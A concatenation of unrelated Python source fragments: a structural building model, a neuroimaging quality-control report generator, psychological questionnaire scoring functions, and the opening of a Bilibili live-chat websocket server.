return self._n_seismic_frames
@n_seismic_frames.setter
def n_seismic_frames(self, value):
self._n_seismic_frames = value
@property
def n_gravity_frames(self):
return self._n_gravity_frames
@n_gravity_frames.setter
def n_gravity_frames(self, value):
self._n_gravity_frames = value
@property
def n_frames(self):
return self.n_gravity_frames + self.n_seismic_frames
def get_column_vert_loads(self):
"""
Vertical loads at column bases
return [len-axis][width-axis]
:return:
"""
n_total = np.sum(self.storey_masses) * 9.8
edge = (self.floor_length - np.sum(self.bay_lengths)) / 2
trib_lens = np.zeros(self.n_cols)
trib_lens[0] = self.bay_lengths[0] / 2 + edge + self.x_offset
trib_lens[-1] = self.bay_lengths[-1] / 2 + edge - self.x_offset
trib_lens[1:-1] = (self.bay_lengths[1:] + self.bay_lengths[:-1]) / 2
tw = self.floor_width / (self.n_frames - 1)
trib_widths = tw * np.ones(self.n_frames + 1)
trib_widths[0] = tw / 2
trib_widths[-1] = tw / 2
return n_total * (trib_lens[:, np.newaxis] * trib_widths[np.newaxis, :]) / self.floor_area
def add_to_dict(self, models_dict, return_mdict=False, **kwargs):
frame_mdict = Frame.add_to_dict(self, models_dict, return_mdict=True, **kwargs)
building_mdict = Building.add_to_dict(self, models_dict, return_mdict=True, **kwargs)
mdict = {**frame_mdict, **building_mdict}
if return_mdict:
return mdict
models_dict[self.base_type][self.unique_hash] = mdict
class FrameBuilding2D(Frame, Building):
_extra_class_inputs = []
type = "frame_building2D"
def __init__(self, n_storeys, n_bays):
"""
A 2 dimensional definition of of frame building
Parameters
----------
n_storeys: int
Number of storeys
n_bays: int
Number of bays
"""
Frame.__init__(self, n_storeys, n_bays)
Building.__init__(self, n_storeys)
# super(FrameBuilding2D, self).__init__(n_storeys, n_bays) # run parent class initialiser function
self.inputs = self.inputs + self._extra_class_inputs
@property
def ancestor_types(self):
return ["physical_object", "frame", "building"] + ["frame_building2D"] # TODO: improve this logic
def to_dict(self, extra=(), compression=True, **kwargs):
outputs = OrderedDict()
skip_list = ["beams", "columns"]
full_inputs = self.inputs + list(extra)
for item in full_inputs:
if item not in skip_list:
value = self.__getattribute__(item)
outputs[item] = sf.collect_serial_value(value)
# Deal with sections
column_sections = OrderedDict()
column_section_ids = []
column_section_count = 0
for ss in range(self.n_storeys):
column_section_ids.append([])
for cc in range(self.n_cols):
column_section_ids[ss].append([])
for sect_i in range(len(self.columns[ss][cc].sections)):
if compression: # build a hash string of the section inputs to check uniqueness
parts = []
for item in self.columns[ss][cc].sections[sect_i].inputs:
if item == "id" or item == "name":
continue
parts.append(item)
parts.append(str(self.columns[ss][cc].get_section_prop(item, section_i=sect_i)))
p_str = "-".join(parts)
else:
p_str = str(sect_i)
if p_str not in column_sections:
column_sections[p_str] = self.columns[ss][cc].sections[sect_i].to_dict(extra)
column_section_count += 1
col_sect_id = column_section_count
column_sections[p_str]["id"] = col_sect_id
else:
col_sect_id = column_sections[p_str]["id"]
column_section_ids[ss][cc].append(col_sect_id)
beam_sections = OrderedDict()
beam_section_ids = []
beam_section_count = 0
for ss in range(self.n_storeys):
beam_section_ids.append([])
for bb in range(self.n_bays):
beam_section_ids[ss].append([])
for sect_i in range(len(self.beams[ss][bb].sections)):
if compression: # build a hash string of the section inputs to check uniqueness
parts = []
for item in self.beams[ss][bb].sections[sect_i].inputs:
if item == "id" or item == "name":
continue
parts.append(item)
parts.append(str(self.beams[ss][bb].get_section_prop(item, section_i=sect_i)))
p_str = "-".join(parts)
else:
p_str = str(sect_i)
if p_str not in beam_sections:
beam_sections[p_str] = self.beams[ss][bb].sections[sect_i].to_dict(extra)
beam_section_count += 1
beam_sect_id = beam_section_count
beam_sections[p_str]["id"] = beam_sect_id
else:
beam_sect_id = beam_sections[p_str]["id"]
beam_section_ids[ss][bb].append(beam_sect_id)
outputs["column_section_ids"] = column_section_ids
outputs["beam_section_ids"] = beam_section_ids
outputs["column_sections"] = OrderedDict()
outputs["beam_sections"] = OrderedDict()
for i, p_str in enumerate(column_sections):
outputs["column_sections"][column_sections[p_str]["id"]] = column_sections[p_str]
for i, p_str in enumerate(beam_sections):
outputs["beam_sections"][beam_sections[p_str]["id"]] = beam_sections[p_str]
return outputs
class WallBuilding(Building):
"""
A building with walls
"""
n_walls = 1
wall_depth = 0.0 # m
wall_width = 0.0 # m
type = "wall_building"
def __init__(self, n_storeys):
super(WallBuilding, self).__init__(n_storeys) # run parent class initialiser function
self._extra_class_inputs = [
"n_walls",
"wall_depth",
"wall_width"
]
self.inputs += self._extra_class_inputs
@property
def ancestor_types(self):
return super(WallBuilding, self).ancestor_types + ["wall_building"]
class SDOFBuilding(PhysicalObject):
"""
An object to describe structures.
"""
_id = None
name = None
base_type = "building"
type = "sdof"
_h_eff = None
_mass_eff = None
_t_fixed = None
_mass_ratio = None
_foundation = None
x_fd = None
z_fd = None
def __init__(self, g=9.8):
self.inputs = [
"id",
"name",
"base_type",
"type",
"h_eff",
"mass_eff",
"t_fixed",
"mass_ratio",
'foundation_id',
'x_fd',
'z_fd'
]
self._g = g
@property
def ancestor_types(self):
return super(SDOFBuilding, self).ancestor_types + ["sdof"]
@property
def id(self):
return self._id
@id.setter
def id(self, value):
self._id = int(value)
@property
def h_eff(self):
return self._h_eff
@h_eff.setter
def h_eff(self, value):
if value is None or value == "":
return
self._h_eff = float(value)
@property
def mass_eff(self):
return self._mass_eff
@mass_eff.setter
def mass_eff(self, value):
if value is None or value == "":
return
self._mass_eff = float(value)
@property
def t_fixed(self):
return self._t_fixed
@t_fixed.setter
def t_fixed(self, value):
if value is None or value == "":
return
self._t_fixed = float(value)
| |
<filename>vaqc/vaqc.py<gh_stars>1-10
import base64
import re
import os.path as op
from io import BytesIO
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import nibabel as nib
import numpy as np
from pathlib import Path
import pandas as pd
import nilearn.image as nim
from dipy.segment.mask import median_otsu
from nipype.utils.filemanip import save_json, load_json
def get_bids_params(fullpath):
bids_patterns = [
r'^(.*/)?(?P<subject_id>sub-[a-zA-Z0-9]+)',
'^.*_(?P<session_id>ses-[a-zA-Z0-9]+)',
'^.*_(?P<task_id>task-[a-zA-Z0-9]+)',
'^.*_(?P<acq_id>acq-[a-zA-Z0-9]+)',
'^.*_(?P<space_id>space-[a-zA-Z0-9]+)',
'^.*_(?P<rec_id>rec-[a-zA-Z0-9]+)',
'^.*_(?P<run_id>run-[a-zA-Z0-9]+)',
'^.*_(?P<dir_id>dir-[a-zA-Z0-9]+)'
]
matches = {"subject_id": None, "session_id": None, "task_id": None, "dir_id": None,
"acq_id": None, "space_id": None, "rec_id": None, "run_id": None}
for pattern in bids_patterns:
pat = re.compile(pattern)
match = pat.search(fullpath)
params = match.groupdict() if match is not None else {}
matches.update(params)
return matches
def reorient_array(data, aff):
# rearrange the matrix to RAS orientation
orientation = nib.orientations.io_orientation(aff)
data_RAS = nib.orientations.apply_orientation(data, orientation)
# In RAS
return nib.orientations.apply_orientation(
data_RAS,
nib.orientations.axcodes2ornt("IPL")
)
def mplfig(data, outfile=None, as_bytes=False):
fig = plt.figure(frameon=False, dpi=data.shape[0])
fig.set_size_inches(float(data.shape[1])/data.shape[0], 1)
ax = plt.Axes(fig, [0., 0., 1., 1.])
ax.set_axis_off()
fig.add_axes(ax)
ax.imshow(data, aspect=1, cmap=plt.cm.Greys_r) # previous aspect="normal"
if outfile:
fig.savefig(outfile, dpi=data.shape[0], transparent=True)
plt.close()
return outfile
if as_bytes:
IObytes = BytesIO()
plt.savefig(IObytes, format='png', dpi=data.shape[0], transparent=True)
IObytes.seek(0)
base64_jpgData = base64.b64encode(IObytes.read())
return base64_jpgData.decode("ascii")
def mplfigcontour(data, outfile=None, as_bytes=False):
fig = plt.figure(frameon=False)
fig.set_size_inches(float(data.shape[1])/data.shape[0], 1)
ax = plt.Axes(fig, [0., 0., 1., 1.])
ax.set_axis_off()
fig.add_axes(ax)
bg = np.zeros(data.shape)
bg[:] = np.nan
ax.imshow(bg, aspect=1, cmap=plt.cm.Greys_r) # used to be aspect="normal"
ax.contour(data, colors="red", linewidths=0.1)
if outfile:
fig.savefig(outfile, dpi=data.shape[0], transparent=True)
plt.close()
return outfile
if as_bytes:
IObytes = BytesIO()
plt.savefig(IObytes, format='png', dpi=data.shape[0], transparent=True)
IObytes.seek(0)
base64_jpgData = base64.b64encode(IObytes.read())
return base64_jpgData.decode("ascii")
def load_and_reorient(filename):
img = nib.load(filename)
data, aff = img.get_data(), img.affine
data = reorient_array(data, aff)
return data
def make_a_square(data_mat, include_last_dim=True):
"""Applies zero padding to make a 2d matrix a square.
Examples:
---------
>>> too_long = np.arange(4 * 7).reshape((4, 7))
>>> long_squared = make_a_square(too_long)
>>> long_squared.shape
(7, 7)
>>> long_squared.sum(1)
array([ 0, 21, 70, 119, 168, 0, 0])
>>> too_tall = np.arange(6 * 5 * 3).reshape((6, 5, 3))
>>> tall_squared = make_a_square(too_tall)
>>> tall_squared.shape
(6, 6, 6)
>>> tall_2squared = make_a_square(too_tall, include_last_dim=False)
>>> tall_2squared.shape
(6, 6, 3)
"""
shapes = data_mat.shape if include_last_dim else data_mat.shape[:-1]
# Is it already square?
if all([shape == shapes[0] for shape in shapes]):
return data_mat
n_dims_to_pad = len(shapes)
largest_side = np.argmax(shapes)
sides_to_pad = np.arange(n_dims_to_pad).tolist()
sides_to_pad.pop(largest_side)
# Must specify padding for all dims
padding = [(0, 0)] * data_mat.ndim
for side_to_pad in sides_to_pad:
needed_padding = shapes[largest_side] - shapes[side_to_pad]
left_pad = int(needed_padding // 2)
right_pad = needed_padding - left_pad
padding[side_to_pad] = (left_pad, right_pad)
return np.pad(data_mat, padding, "constant", constant_values=(0, 0))
def nearest_square(limit):
answer = 0
while (answer + 1) ** 2 < limit:
answer += 1
if (answer ** 2) == limit:
return answer
else:
return answer + 1
def create_sprite_from_tiles(tile, out_file=None, as_bytes=False):
num_slices = tile.shape[-1]
N = nearest_square(num_slices)
M = int(np.ceil(num_slices/N))
# tile is square, so just make a big arr
pix = tile.shape[0]
if len(tile.shape) == 3:
mosaic = np.zeros((N*tile.shape[0], M*tile.shape[0]))
else:
mosaic = np.zeros((N*tile.shape[0], M*tile.shape[0], tile.shape[-2]))
mosaic[:] = np.nan
helper = np.arange(N*M).reshape((N, M))
for t in range(num_slices):
x, y = np.nonzero(helper == t)
xmin = x[0] * pix
xmax = (x[0] + 1) * pix
ymin = y[0] * pix
ymax = (y[0] + 1) * pix
x_span = xmax - xmin
y_span = ymax - ymin
if len(tile.shape) == 3:
mosaic[xmin:xmax, ymin:ymax] = tile[:x_span, :y_span, t]
else:
mosaic[xmin:xmax, ymin:ymax, :] = tile[:x_span, :y_span, :, t]
if as_bytes:
img = mplfig(mosaic, out_file, as_bytes=as_bytes)
return dict(img=img, N=N, M=M, pix=pix, num_slices=num_slices)
if out_file:
img = mplfig(mosaic, out_file), N, M, pix, num_slices
return dict(mosaic=mosaic, N=N, M=M, pix=pix, num_slices=num_slices)
def createSprite4D(dwi_file):
# initialize output dict
output = []
# load the file
dwi = load_and_reorient(dwi_file)[:, :, :, 1:]
# create tiles from center slice on each orientation
for orient in ['sag', 'ax', 'cor']:
axis_tiles = get_middle_slice_tiles(dwi, orient)
# create sprite images for the axis
results = embed_tiles_in_json_sprite(axis_tiles, as_bytes=True)
results['img_type'] = '4dsprite'
results['orientation'] = orient
output.append(results)
return output
def square_and_normalize_slice(slice2d):
tile_data = make_a_square(slice2d)
max_value = np.percentile(tile_data, 98)
tile_data[tile_data > max_value] = max_value
return tile_data / max_value
def embed_tiles_in_json_sprite(tile_list, as_bytes=True, out_file=None):
"""Make a big rectangle containing the images for a brainsprite.
Parameters:
-----------
tile_list : list
List of 2d square numpy arrays to stick in a mosaic
Returns:
--------
mosaic : np.ndarray
Mosaic of tile images
"""
# Tiles are squares
tile_size = tile_list[0].shape[0]
num_tiles = len(tile_list)
num_tile_rows = nearest_square(num_tiles)
num_tile_cols = int(np.ceil(num_tiles/num_tile_rows))
mosaic = np.zeros((num_tile_rows * tile_size,
num_tile_cols * tile_size))
i_indices, j_indices = np.unravel_index(np.arange(num_tiles),
(num_tile_rows, num_tile_cols))
i_tile_offsets = tile_size * i_indices
j_tile_offsets = tile_size * j_indices
for tile, i_offset, j_offset in zip(tile_list, i_tile_offsets,
j_tile_offsets):
mosaic[i_offset:(i_offset + tile_size),
j_offset:(j_offset + tile_size)] = tile
if as_bytes:
img = mplfig(mosaic, out_file, as_bytes=as_bytes)
return dict(img=img, N=num_tile_rows, M=num_tile_cols,
pix=tile_size, num_slices=num_tiles)
return dict(mosaic=mosaic, N=num_tile_rows, M=num_tile_cols,
pix=tile_size, num_slices=num_tiles)
def get_middle_slice_tiles(data, slice_direction):
"""Create a strip of intensity-normalized, square middle slices.
"""
slicer = {"ax": 0, "cor": 1, "sag": 2}
all_data_slicer = [slice(None), slice(None), slice(None)]
num_slices = data.shape[slicer[slice_direction]]
slice_num = int(num_slices / 2)
all_data_slicer[slicer[slice_direction]] = slice_num
middle_slices = data[tuple(all_data_slicer)]
num_slices = middle_slices.shape[2]
slice_tiles = [square_and_normalize_slice(middle_slices[..., mid_slice])
for mid_slice in range(num_slices)]
return slice_tiles
def createB0_ColorFA_Mask_Sprites(b0_file, colorFA_file, mask_file):
colorfa = make_a_square(load_and_reorient(colorFA_file), include_last_dim=False)
b0 = make_a_square(load_and_reorient(b0_file)[:, :, :, 0])
anat_mask = make_a_square(load_and_reorient(mask_file))
# make a b0 sprite
_, mask = median_otsu(b0)
outb0 = create_sprite_from_tiles(b0, as_bytes=True)
outb0['img_type'] = 'brainsprite'
# make a colorFA sprite, masked by b0
Q = make_a_square(colorfa, include_last_dim=False)
Q[np.logical_not(mask)] = np.nan
Q = np.moveaxis(Q, -2, -1)
outcolorFA = create_sprite_from_tiles(Q, as_bytes=True)
outcolorFA['img_type'] = 'brainsprite'
# make an anat mask contour sprite
outmask = create_sprite_from_tiles(
make_a_square(anat_mask, include_last_dim=False))
img = mplfigcontour(outmask.pop("mosaic"), as_bytes=True)
outmask['img'] = img
return outb0, outcolorFA, outmask
def create_report_json(dwi_corrected_file, eddy_rms, eddy_report,
color_fa_file, anat_mask_file,
outlier_indices,
eddy_qc_file,
outpath=op.abspath('./report.json')):
report = {}
report['dwi_corrected'] = createSprite4D(dwi_corrected_file)
b0, colorFA, mask = createB0_ColorFA_Mask_Sprites(dwi_corrected_file,
color_fa_file,
anat_mask_file)
report['b0'] = b0
# report['colorFA'] = colorFA
report['anat_mask'] = mask
report['outlier_volumes'] = outlier_indices.tolist()
with open(eddy_report, 'r') as f:
report['eddy_report'] = f.readlines()
report['eddy_params'] = np.genfromtxt(eddy_rms).tolist()
eddy_qc = load_json(eddy_qc_file)
report['eddy_quad'] = eddy_qc
save_json(outpath, report)
return outpath
def create_bold_Mask_Sprites(bold_file):
boldref = load_and_reorient(str(bold_file).replace("desc-preproc_bold",
"boldref"))
boldmask = load_and_reorient(
str(bold_file).replace("desc-preproc_bold", "desc-brain_mask"))
b0 = boldref
anat_mask = boldmask
# make a boldref sprite
outb0 = create_sprite_from_tiles(b0, as_bytes=True)
outb0['img_type'] = 'brainsprite'
# make an anat mask contour sprite
outmask = create_sprite_from_tiles(
make_a_square(anat_mask, include_last_dim=False))
img = mplfigcontour(outmask.pop("mosaic"), as_bytes=True)
outmask['img'] = img
return outb0, outmask
def get_fmriprep_outlier_volumes_from_confounds(confounds_df):
"""extract which volume numbers are outliers from the fmriprep confounds df.
Returns:
bad_volumes: list
eg [34, 35, 100, 150]
"""
# get the motion columns
motion = confounds_df.filter(regex='motion')
# find any rows with values above 0
return_df = motion[(motion > 0).any(1)]
# return the index (row names) of this df
return list(return_df.index)
def get_fmriprep_stats_info(bold_corrected_file, confounds_df):
"""Create a dictionary that has single values per interesting thing.
@ziz
eg {"max_fd": 99.4, "max_rmsd":5, "dimension_x": 140, "subject_id}
"""
subject_info = get_bids_params(bold_corrected_file.name)
qc = {'mean_fd': np.nanmean(confounds_df.framewise_displacement),
'max_fd': np.nanmax(confounds_df.framewise_displacement),
'mean_rmsd': np.nanmean(confounds_df.rmsd),
'max_rmsd': np.nanmax(confounds_df.rmsd),
'mean_dvars': np.nanmean(confounds_df.dvars),
'max_dvars': np.nanmax(confounds_df.dvars)}
qc.update(subject_info)
qc['participant_id'] = qc['subject_id']
qc['file_name'] = bold_corrected_file.name.replace(".nii.gz", "").replace(".nii", "")
return qc
def create_bold_report_json(bold_corrected_file, confounds_file, outpath):
"""Creates a json file on disk with images and info about the fmriprep run.
"""
report = {}
report['dwi_corrected'] = createSprite4D(bold_corrected_file)
b0, mask = create_bold_Mask_Sprites(bold_corrected_file)
report['b0'] = b0
report['anat_mask'] = mask
# Load the confounds data
confounds_df = pd.read_csv(str(confounds_file), sep="\t")
# Find the outlier volumes
report['outlier_volumes'] = \
get_fmriprep_outlier_volumes_from_confounds(confounds_df)
report['eddy_params'] = np.nan_to_num(confounds_df[
['framewise_displacement', 'rmsd']].to_numpy()).tolist()
report['eddy_quad'] = {}
report['qc_scores'] = get_fmriprep_stats_info(bold_corrected_file,
confounds_df)
save_json(outpath, report)
return report['qc_scores']
def find_confounds_file(nii_file):
"""Finds the corresponding confounds.tsv file for a bold.nii.gz
Parameters:
nii_file: pathlib.Path
Returns:
confounds_file: pathlib.Path
"""
confounds_options = [str(fname).replace("desc-confounds_timeseries.tsv", "") for
fname in nii_file.parent.glob("*confound*tsv")]
confounds_file, = [fname for fname in confounds_options if
str(nii_file).startswith(fname)]
return Path(confounds_file + "desc-confounds_timeseries.tsv")
def report_from_nii(nii_file):
"""Creates a report json and returns subject QC scores dict.
Parameters:
nii_file: pathlib.Path
"""
output_file = Path(
str(nii_file).replace("desc-preproc_bold.nii.gz", "vaqc.json"))
print("Creating", str(output_file))
confounds_file = find_confounds_file(nii_file)
subject_scores = create_bold_report_json(nii_file, confounds_file,
output_file)
return subject_scores
def process_fmriprep_subject(subject_dir):
"""Creates a QC file and
Parameters:
subject_dir: pathlib.Path
"""
processed_images = list(subject_dir.rglob("**/*desc-preproc*_bold.nii.gz"))
print("found ", "\n\t".join(map(str, processed_images)))
image_qcs = []
for image_file in processed_images:
image_qcs.append(report_from_nii(image_file))
return image_qcs
def process_fmriprep(input_dir):
"""Take an fmriprep output directory and create report data
for the viewer.
Parameters:
input_dir: pathlib.Path
"""
subject_dirs = [_pth for _pth in input_dir.glob("sub-*")
if _pth.is_dir()]
summary_json = input_dir / "vaqc.json"
image_qcs = []
for subject_dir in subject_dirs:
print("Processing directory:", str(subject_dir))
image_qcs += process_fmriprep_subject(subject_dir)
# Write out | |
[2, 5, 7, 10, 13, 17, 20, 23],
"CalmNervous": [3, 6, 9, 12, 15, 19, 22, 24],
}
_assert_value_range(data, score_range)
# Reverse scores 3, 4, 5, 7, 9, 11, 13, 16, 18, 19, 22, 23
# (numbers in the dictionary correspond to the *positions* of the items to be reversed in the item list specified
# by the subscale dict)
data = _invert_subscales(
data,
subscales=subscales,
idx_dict={
"GoodBad": [1, 3, 5, 6],
"AwakeTired": [1, 2, 4, 7],
"CalmNervous": [0, 2, 5, 6],
},
score_range=score_range,
)
mdbf_data = _compute_questionnaire_subscales(data, score_name, subscales)
if len(data.columns) == 24:
# compute total score if all columns are present
mdbf_data[score_name] = data.sum(axis=1)
return pd.DataFrame(mdbf_data, index=data.index)
def meq(
data: pd.DataFrame,
columns: Optional[Union[Sequence[str], pd.Index]] = None,
) -> pd.DataFrame:
"""Compute the **Morningness Eveningness Questionnaire (MEQ)**.
The MEQ measures whether a person's circadian rhythm (biological clock) produces peak alertness in the morning,
in the evening, or in between. The original study showed that the subjective time of peak alertness correlates
with the time of peak body temperature; morning types (early birds) have an earlier temperature peak than evening
types (night owls), with intermediate types having temperature peaks between the morning and evening
chronotype groups.
Besides the MEQ score the function classifies the chronotype in two stages:
* 5 levels (``Chronotype_Fine``):
* 0: definite evening type (MEQ score 14-30)
* 1: moderate evening type (MEQ score 31-41)
* 2: intermediate type (MEQ score 42-58)
* 3: moderate morning type (MEQ score 59-69)
* 4: definite morning type (MEQ score 70-86)
* 3 levels (``Chronotype_Coarse``):
* 0: evening type (MEQ score 14-41)
* 1: intermediate type (MEQ score 42-58)
* 2: morning type (MEQ score 59-86)
.. note::
This implementation assumes a score range of [1, 4], except for some columns, which have a score range
of [1, 5]. Use :func:`~biopsykit.questionnaires.utils.convert_scale()` to convert the items into the correct
range beforehand.
Parameters
----------
data : :class:`~pandas.DataFrame`
dataframe containing questionnaire data. Can either be only the relevant columns for computing this score or
a complete dataframe if ``columns`` parameter is supplied.
columns : list of str or :class:`pandas.Index`, optional
list with column names in correct order.
This can be used if columns in the dataframe are not in the correct order or if a complete dataframe is
passed as ``data``.
Returns
-------
pd.DataFrame
MEQ score and Chronotype Classification
References
----------
<NAME>., & <NAME>. (1976). A self-assessment questionnaire to determine morningness-eveningness in
human circadian rhythms. *International journal of chronobiology.*
"""
score_name = "MEQ"
score_range = [1, 4]
if columns is not None:
# if columns parameter is supplied: slice columns from dataframe
_assert_has_columns(data, [columns])
data = data.loc[:, columns]
_assert_num_columns(data, 19)
# some columns have scores from 1-5 => check them separately
col_idx = to_idx([1, 2, 10, 17, 18])
try:
_assert_value_range(data.iloc[:, col_idx], [1, 5])
col_mask = np.arange(0, len(data.columns))
col_mask = col_mask[~np.isin(col_mask, col_idx)]
_assert_value_range(data.iloc[:, col_mask], score_range)
except ValueRangeError as e:
raise ValueRangeError(
"This implementation of MEQ expects all values in the range {}, except the columns {}, "
"which are expected to be in the range {}! "
"Please consider converting to the correct range using "
"`biopsykit.questionnaire.utils.convert_scale()`.".format(score_range, col_idx, [1, 5])
) from e
# invert items 1, 2, 10, 17, 18 (score range [1, 5])
data = invert(data, cols=to_idx([1, 2, 10, 17, 18]), score_range=[1, 5])
# invert items 3, 8, 9, 10, 11, 13, 15, 19 (score range [1, 4])
data = invert(
data,
cols=to_idx([3, 8, 9, 11, 13, 15, 19]),
score_range=score_range,
)
# recode items 11, 12, 19
data.iloc[:, to_idx(11)].replace({1: 0, 2: 2, 3: 4, 4: 6}, inplace=True)
data.iloc[:, to_idx(12)].replace({1: 0, 2: 2, 3: 3, 4: 5}, inplace=True)
data.iloc[:, to_idx(19)].replace({1: 0, 2: 2, 3: 4, 4: 6}, inplace=True)
meq_data = pd.DataFrame(data.sum(axis=1), columns=[score_name])
meq_data["Chronotype_Fine"] = bin_scale(meq_data[score_name], bins=[0, 30, 41, 58, 69, 86])
meq_data["Chronotype_Coarse"] = bin_scale(meq_data[score_name], bins=[0, 41, 58, 86])
return meq_data
def kab(data: pd.DataFrame, columns: Optional[Union[Sequence[str], pd.Index]] = None) -> pd.DataFrame:
"""Compute the **Kurzfragebogen zur aktuellen Beanspruchung (KAB)**.
The KAB measures currently perceived and expected stress in the near future.
.. note::
This implementation assumes a score range of [1, 6].
Use :func:`~biopsykit.questionnaires.utils.convert_scale()` to convert the items into the correct range
beforehand.
Parameters
----------
data : :class:`~pandas.DataFrame`
dataframe containing questionnaire data. Can either be only the relevant columns for computing this score or
a complete dataframe if ``columns`` parameter is supplied.
columns : list of str or :class:`pandas.Index`, optional
list with column names in correct order.
This can be used if columns in the dataframe are not in the correct order or if a complete dataframe is
passed as ``data``.
Returns
-------
:class:`~pandas.DataFrame`
KAB score
Raises
------
:exc:`~biopsykit.utils.exceptions.ValidationError`
if number of columns does not match
:exc:`~biopsykit.utils.exceptions.ValueRangeError`
if values are not within the required score range
References
----------
<NAME>., & <NAME>. (1993). Kurzfragebogen zur aktuellen Beanspruchung. [Manual Beltz Test].
*Weinheim: Germany*.
"""
score_name = "KAB"
score_range = [1, 6]
# create copy of data
data = data.copy()
if columns is not None:
# if columns parameter is supplied: slice columns from dataframe
_assert_has_columns(data, [columns])
data = data.loc[:, columns]
_assert_num_columns(data, 6)
_assert_value_range(data, score_range)
# Invert Item 1, 3 and 5
data = invert(data, score_range, cols=to_idx([1, 3, 5]))
return pd.DataFrame(data.mean(axis=1), columns=[score_name])
def stai_short(
data: pd.DataFrame,
columns: Optional[Union[Sequence[str], pd.Index]] = None,
stai_type: Optional[Literal["state", "trait"]] = None,
) -> pd.DataFrame:
"""Compute the short version of the State Anxiety facet of the **State Trait Anxiety Inventory**.
.. note::
This implementation assumes a score range of [1, 4].
Use :func:`~biopsykit.questionnaires.utils.convert_scale()` to convert the items into the correct range
beforehand.
Parameters
----------
data : :class:`~pandas.DataFrame`
dataframe containing questionnaire data. Can either be only the relevant columns for computing this score or
a complete dataframe if ``columns`` parameter is supplied.
columns : list of str or :class:`pandas.Index`, optional
list with column names in correct order.
This can be used if columns in the dataframe are not in the correct order or if a complete dataframe is
passed as ``data``.
stai_type : any of ``state``, ``trait``
which type of STAI subscale should be computed. Default: ``state``
Returns
-------
:class:`~pandas.DataFrame`
STAI score
Raises
------
:exc:`~biopsykit.utils.exceptions.ValidationError`
if number of columns does not match
:exc:`~biopsykit.utils.exceptions.ValueRangeError`
if values are not within the required score range
References
----------
Spielberger, <NAME>. (1970). Manual for the State-trait Anxietry, Inventory. *Consulting Psychologist*.
"""
subscales = {"GES": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10], "SKD": [2, 3, 5, 7, 9]}
_assert_num_columns(data, [10, 20])
stai_data = {}
for st in stai_type:
if st == "state":
inverted = invert(data, score_range=[1, 4], cols=to_idx([1, 4, 6, 10]))
else:
inverted = invert(data, score_range=[1, 4], cols=to_idx([3, 4, 7]))
stai_data.update(stadi(data=inverted, columns=columns, subscales=subscales, stadi_type=st))
stai = pd.DataFrame(stai_data, index=data.index)
if stai_type[0] == "state":
name = "SAI"
else:
name = "TAI"
stai.rename(
columns={
f"STADI_{stai_type[0].capitalize()}_GES": f"{name}_ges",
f"STADI_{stai_type[0].capitalize()}_SKD": f"{name}_SKD",
},
inplace=True,
)
stai[f"{name}_SKD"] /= 5
return stai
def idq_pre_scan(data: pd.DataFrame, columns: Optional[Union[Sequence[str], pd.Index]] = None) -> pd.DataFrame:
"""Compute the **Pre-Scan Imaging Distress Questionnaire** (IDQ_PRE).
.. note::
This implementation assumes a score range of [1, 5].
Use :func:`~biopsykit.questionnaires.utils.convert_scale()` to convert the items into the correct range
beforehand.
Parameters
----------
data : :class:`~pandas.DataFrame`
dataframe containing questionnaire data. Can either be only the relevant columns for computing this score or
a complete dataframe if ``columns`` parameter is supplied.
columns : list of str or :class:`pandas.Index`, optional
list with column names in correct order.
This can be used if columns in the dataframe are not in the correct order or if a complete dataframe is
passed as ``data``.
Returns
-------
:class:`~pandas.DataFrame`
PQ score
Raises
------
:exc:`~biopsykit.utils.exceptions.ValidationError`
if number of columns does not match
:exc:`~biopsykit.utils.exceptions.ValueRangeError`
if values are not within the required score range
References
----------
<NAME>., <NAME>., <NAME>., <NAME>., <NAME>., <NAME>., ... & <NAME>. (1997).
A study of the effects of patient anxiety, perceptions and equipment on motion artifacts in magnetic resonance
imaging. *Magnetic resonance imaging*, 15(3), 301-306.
"""
score_name = "IDQ_PRE"
score_range = [1, 3]
# create copy of data
data = data.copy()
| |
# -*- coding: utf-8 -*-
import asyncio
import enum
import json
import logging
import random
import time
import uuid
from typing import *
import aiohttp
import tornado.websocket
import api.base
import blivedm.blivedm as blivedm
import config
import models.avatar
import models.translate
import models.log
logger = logging.getLogger(__name__)
class Command(enum.IntEnum):
HEARTBEAT = 0
JOIN_ROOM = 1
ADD_TEXT = 2
ADD_GIFT = 3
ADD_MEMBER = 4
ADD_SUPER_CHAT = 5
DEL_SUPER_CHAT = 6
UPDATE_TRANSLATION = 7
_http_session = aiohttp.ClientSession(timeout=aiohttp.ClientTimeout(total=10))
room_manager: Optional['RoomManager'] = None
def init():
global room_manager
room_manager = RoomManager()
class Room(blivedm.BLiveClient):
HEARTBEAT_INTERVAL = 10
# 重新定义parse_XXX是为了减少对字段名的依赖,防止B站改字段名
def __parse_danmaku(self, command):
info = command['info']
if info[3]:
room_id = info[3][3]
medal_level = info[3][0]
else:
room_id = medal_level = 0
return self._on_receive_danmaku(blivedm.DanmakuMessage(
None, None, None, info[0][4], None, None, info[0][9], None,
info[1],
info[2][0], info[2][1], info[2][2], None, None, info[2][5], info[2][6], None,
medal_level, None, None, room_id, None, None,
info[4][0], None, None,
None, None,
info[7]
))
def __parse_gift(self, command):
data = command['data']
return self._on_receive_gift(blivedm.GiftMessage(
data['giftName'], data['num'], data['uname'], data['face'], None,
data['uid'], data['timestamp'], None, None,
None, None, None, data['coin_type'], data['total_coin']
))
def __parse_buy_guard(self, command):
data = command['data']
return self._on_buy_guard(blivedm.GuardBuyMessage(
data['uid'], data['username'], data['guard_level'], None, None,
None, None, data['start_time'], None
))
def __parse_super_chat(self, command):
data = command['data']
return self._on_super_chat(blivedm.SuperChatMessage(
data['price'], data['message'], None, data['start_time'],
None, None, data['id'], None,
None, data['uid'], data['user_info']['uname'],
data['user_info']['face'], None,
None, None,
None, None, None,
None
))
_COMMAND_HANDLERS = {
**blivedm.BLiveClient._COMMAND_HANDLERS,
'DANMU_MSG': __parse_danmaku,
'SEND_GIFT': __parse_gift,
'GUARD_BUY': __parse_buy_guard,
'SUPER_CHAT_MESSAGE': __parse_super_chat
}
def __init__(self, room_id):
super().__init__(room_id, session=_http_session, heartbeat_interval=self.HEARTBEAT_INTERVAL)
self.clients: List['ChatHandler'] = []
self.auto_translate_count = 0
async def init_room(self):
await super().init_room()
return True
def stop_and_close(self):
if self.is_running:
future = self.stop()
future.add_done_callback(lambda _future: asyncio.ensure_future(self.close()))
else:
asyncio.ensure_future(self.close())
def send_message(self, cmd, data):
body = json.dumps({'cmd': cmd, 'data': data})
models.log.add_danmaku(self.room_id, body)
for client in self.clients:
try:
client.write_message(body)
